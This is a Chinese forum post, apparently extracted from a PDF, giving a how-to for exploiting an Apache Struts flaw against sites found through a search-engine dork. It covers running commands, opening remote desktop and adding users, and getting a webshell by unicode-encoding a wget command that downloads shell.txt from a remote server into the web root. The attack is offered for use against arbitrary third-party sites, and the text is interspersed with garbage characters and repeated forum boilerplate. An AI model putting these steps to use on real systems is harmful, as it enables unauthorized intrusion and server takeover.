struts漏洞利用方法,可get shell.pdfVIP

看帖子的时候发现好多人居然不会用~特地来写一篇文章，大牛就绕过了。- 专注信息安全4 W2 j! G3 f9 F! P# D H 基于gainover 的那个exp 哈 gainover 是工具猫的作者，所以他的exp 也写到了工具猫里。 首先运行工具猫的主软件 然后双击struts 利用 1 M L/ w, v; -? n) H8 ? ^. @ 百度：inurl:news.action 看到很多结果，随便扔一个进去90 Security Team* T( h( o* {2 L 然后填到exp 的测试地址，点监测是否有漏洞2 c1 R* E$ i. | C( v1 @2 s 再然后有漏洞的话就执行命令了，windows 下的开3389、填用户什么的就不说了。 就说下get shell 的问题。90 Security Team- M4 u* `+ r, 4 c; Q9 a2 a$ j8 j\ 这个工具之前也发现了，对命令的交互不是很好，有些处理不好，比如echo $HOME， 它就直接打印出了$HOME,而不是把变量打印出来。这样子就会导致无法将小马 echo 进去。 d# y% n+ U$ i, [ H; v X) L 90sec# l: n8 H3 c1 V# U$ p) e 经过百度struts 漏洞原理加问别人，发现主要是编码的问题，测试的时候将:- /还有空格 这四个符号都用16 进制进行编码就可以成功。90sec-国内后起的信息安全论坛之一,专注web安全软件安全, 无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。, 9 D$ ? v, F: F$ z4 U1 x L 比如wget 命令，如果要get 个shell，不要填wget /shell.txt 要这样写： 1. wget\u0020http\u003a\u002f\\u002fUploadFiles\u 002f1\u002fshell.txt 复制代码 90sec-国内后起的信息安全论坛之一专注, web安全软件安全, 无线安全等领域技术交流与讨论。我们以最大的努力为网络撑起一片蔚蓝的天空，同时也希望更多的技术爱好者加入我们。, c+ M4 r. t8 ~3 } 执行成功后就mv 到网站根目录就OK 了 其他命令执行不成功的时候类似编码处理~